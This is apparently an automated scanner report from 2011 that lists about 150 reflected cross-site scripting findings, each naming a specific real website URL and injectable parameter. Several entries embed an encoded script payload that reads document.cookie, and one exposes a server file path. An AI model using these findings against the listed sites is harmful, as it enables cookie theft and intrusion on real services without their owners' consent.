XSS, Cross Site Scripting, DORK Report, CWE-79, CAPEC-86

XSS Report of DORK Searches | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sat Feb 05 07:26:39 CST 2011.



DORK CWE-79 XSS Report

1. Cross-site scripting (reflected)

1.1. http://app.quotemedia.com/quotetools/clientForward [REST URL parameter 1]

1.2. http://ar.voicefive.com/b/rc.pli [func parameter]

1.3. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]

1.4. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]

1.5. http://blog.sherifmansour.com/ [name of an arbitrarily supplied request parameter]

1.6. http://digg.com/submit [REST URL parameter 1]

1.7. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 2]

1.8. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 3]

1.9. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 4]

1.10. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 2]

1.11. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 3]

1.12. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 4]

1.13. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 2]

1.14. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 3]

1.15. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 4]

1.16. http://goop.com/ [name of an arbitrarily supplied request parameter]

1.17. http://goop.com/css/global.css [REST URL parameter 1]

1.18. http://goop.com/css/global.css [REST URL parameter 2]

1.19. http://goop.com/favicon.ico [REST URL parameter 1]

1.20. http://goop.com/js/AC_RunActiveContent.js [REST URL parameter 1]

1.21. http://goop.com/js/AC_RunActiveContent.js [REST URL parameter 2]

1.22. http://img.mediaplex.com/content/0/15017/120648/2302-rsa-banner-728x90.js [mpck parameter]

1.23. http://img.mediaplex.com/content/0/15017/120648/2302-rsa-banner-728x90.js [mpvc parameter]

1.24. http://intensedebate.com/comment/dd5b14065e2bc9e2bfced67832069618/generic/73522711 [REST URL parameter 1]

1.25. http://intensedebate.com/empty.php [REST URL parameter 1]

1.26. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]

1.27. http://intensedebate.com/fb-connect/fbConnect.php [REST URL parameter 2]

1.28. http://intensedebate.com/fb-connect/fbConnect.php [name of an arbitrarily supplied request parameter]

1.29. http://intensedebate.com/fb-connect/getFB.php [REST URL parameter 2]

1.30. http://intensedebate.com/fb-connect/getFB.php [name of an arbitrarily supplied request parameter]

1.31. http://intensedebate.com/idc/js/comment-func.php [REST URL parameter 3]

1.32. http://intensedebate.com/idc/js/comment-func.php [name of an arbitrarily supplied request parameter]

1.33. http://intensedebate.com/js/genericCommentWrapper2.php [REST URL parameter 2]

1.34. http://intensedebate.com/js/genericCommentWrapper2.php [name of an arbitrarily supplied request parameter]

1.35. http://intensedebate.com/js/getUserMenu.php [REST URL parameter 2]

1.36. http://intensedebate.com/js/getUserMenu.php [name of an arbitrarily supplied request parameter]

1.37. http://intensedebate.com/logmein [REST URL parameter 1]

1.38. http://intensedebate.com/logmein [name of an arbitrarily supplied request parameter]

1.39. http://itknowledgehub.com/ [name of an arbitrarily supplied request parameter]

1.40. http://jlinks.industrybrains.com/jsct [ct parameter]

1.41. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

1.42. http://jlinks.industrybrains.com/jsct [tr parameter]

1.43. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 4]

1.44. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

1.45. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

1.46. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

1.47. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 6]

1.48. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 6]

1.49. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 7]

1.50. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 7]

1.51. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

1.52. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

1.53. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

1.54. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 9]

1.55. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 4]

1.56. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 5]

1.57. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 6]

1.58. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 7]

1.59. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 8]

1.60. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 9]

1.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 4]

1.62. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 5]

1.63. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 6]

1.64. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 7]

1.65. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 8]

1.66. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 9]

1.67. http://pcgro.com/ [name of an arbitrarily supplied request parameter]

1.68. http://s.intensedebate.com/css/base.css [REST URL parameter 2]

1.69. http://s.intensedebate.com/css/ie6.css [REST URL parameter 2]

1.70. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]

1.71. http://s.intensedebate.com/images/avatar-compact.png/ [REST URL parameter 1]

1.72. http://s.intensedebate.com/images/avatar-compact.png/ [REST URL parameter 2]

1.73. http://s.intensedebate.com/images/avatar-compact.png/ [name of an arbitrarily supplied request parameter]

1.74. http://s.intensedebate.com/images/twitter-favicon.ico [REST URL parameter 2]

1.75. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]

1.76. http://shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 1]

1.77. http://shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 1]

1.78. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 1]

1.79. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 2]

1.80. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 1]

1.81. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 2]

1.82. http://thefastertimes.com/about/ [name of an arbitrarily supplied request parameter]

1.83. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 1]

1.84. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 2]

1.85. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 3]

1.86. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 4]

1.87. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 5]

1.88. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 6]

1.89. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [name of an arbitrarily supplied request parameter]

1.90. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 parameter]

1.91. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 10]

1.92. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 11]

1.93. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 12]

1.94. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 13]

1.95. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 14]

1.96. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 1]

1.97. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 2]

1.98. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 3]

1.99. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 4]

1.100. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 5]

1.101. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 6]

1.102. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 7]

1.103. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 8]

1.104. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 9]

1.105. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [name of an arbitrarily supplied request parameter]

1.106. http://thefastertimes.com/wp-content/plugins/g-lock-double-opt-in-manager/js/glock2.min.js [REST URL parameter 1]

1.107. http://thefastertimes.com/wp-login.php [REST URL parameter 1]

1.108. http://thefastertimes.com/xmlrpc.php [REST URL parameter 1]

1.109. http://whitepapers.scmagazineuk.com/email_this_page.php [name of an arbitrarily supplied request parameter]

1.110. http://whitepapers.scmagazineuk.com/email_this_page.php [url parameter]

1.111. http://whitepapers.scmagazineuk.com/index.php [limit parameter]

1.112. http://whitepapers.scmagazineuk.com/index.php [sort parameter]

1.113. http://www.astaro.com/newsletter [uid parameter]

1.114. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

1.115. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

1.116. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

1.117. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

1.118. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

1.119. http://www.blogtalkradio.com/ajax2.aspx [JSONCallback parameter]

1.120. http://www.blogtalkradio.com/ajax2.aspx [ctx parameter]

1.121. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming [REST URL parameter 3]

1.122. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming [REST URL parameter 4]

1.123. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 [REST URL parameter 3]

1.124. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 [REST URL parameter 4]

1.125. http://www.businesswire.com/news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp [REST URL parameter 3]

1.126. http://www.businesswire.com/news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp [REST URL parameter 4]

1.127. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId parameter]

1.128. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang parameter]

1.129. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink parameter]

1.130. http://www.dinclinx.com/ [name of an arbitrarily supplied request parameter]

1.131. http://www.ereadable.com/scripts/browse.asp [source parameter]

1.132. http://www.haymarketbusinesssubs.com/subscriptions/ [cat parameter]

1.133. http://www.haymarketbusinesssubs.com/subscriptions/ [fuseaction parameter]

1.134. http://www.haymarketbusinesssubs.com/subscriptions/ [itemID parameter]

1.135. http://www.haymarketbusinesssubs.com/subscriptions/ [name of an arbitrarily supplied request parameter]

1.136. http://www.installsoftware.com/favicon.ico [REST URL parameter 1]

1.137. http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformation/security_software [REST URL parameter 1]

1.138. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]

1.139. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]

1.140. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]

1.141. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 1]

1.142. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 2]

1.143. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 3]

1.144. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 1]

1.145. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 2]

1.146. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 3]

1.147. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 4]

1.148. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 5]

1.149. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [name of an arbitrarily supplied request parameter]

1.150. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 1]

1.151. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 2]

1.152. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 3]

